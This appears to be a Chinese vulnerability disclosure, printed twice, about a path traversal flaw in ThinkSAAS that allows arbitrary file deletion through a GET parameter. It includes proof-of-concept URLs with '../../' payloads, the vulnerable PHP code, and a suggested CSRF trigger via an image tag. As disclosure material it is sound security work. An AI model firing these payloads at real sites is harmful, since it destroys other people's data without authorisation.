VULHUB ™

### 简要描述： RT ### 详细说明： POC : http://localhost/thinksaas/index.php?app=system&ac=sql&ts=delete&sql=../../CHANGELOG.TXT ``` case "delete": $sql = tsFilter($_GET['sql']); rmrf('data/baksql/'.$sql); qiMsg('删除成功！如果有其他卷文件请一同删除!'); break; ``` 没有做任何的检查 而且tsFilter貌似是防止SQL注入的吧..... ``` /** * 删除目录下所有文件 * @param unknown $dir */ function rmrf($dir) { foreach ( glob ( $dir ) as $file ) { if (is_dir ( $file )) { rmrf ( "$file/*" ); rmdir ( $file ); } else { unlink ( $file ); } } } ``` 删除目录下所有文件...太恐怖了.... 而且还是GET请求，可以很简单的造成CSRF 插入个图片，网址为 ： http://localhost/thinksaas/index.php?app=system&ac=sql&ts=delete&sql=../../LICENSE.TXT LICENSE.TXT就被删除了... ### 漏洞证明： 这....我不懂怎么证明...

### 简要描述： RT ### 详细说明： POC : http://localhost/thinksaas/index.php?app=system&ac=sql&ts=delete&sql=../../CHANGELOG.TXT ``` case "delete": $sql = tsFilter($_GET['sql']); rmrf('data/baksql/'.$sql); qiMsg('删除成功！如果有其他卷文件请一同删除!'); break; ``` 没有做任何的检查 而且tsFilter貌似是防止SQL注入的吧..... ``` /** * 删除目录下所有文件 * @param unknown $dir */ function rmrf($dir) { foreach ( glob ( $dir ) as $file ) { if (is_dir ( $file )) { rmrf ( "$file/*" ); rmdir ( $file ); } else { unlink ( $file ); } } } ``` 删除目录下所有文件...太恐怖了.... 而且还是GET请求，可以很简单的造成CSRF 插入个图片，网址为 ： http://localhost/thinksaas/index.php?app=system&ac=sql&ts=delete&sql=../../LICENSE.TXT LICENSE.TXT就被删除了... ### 漏洞证明： 这....我不懂怎么证明...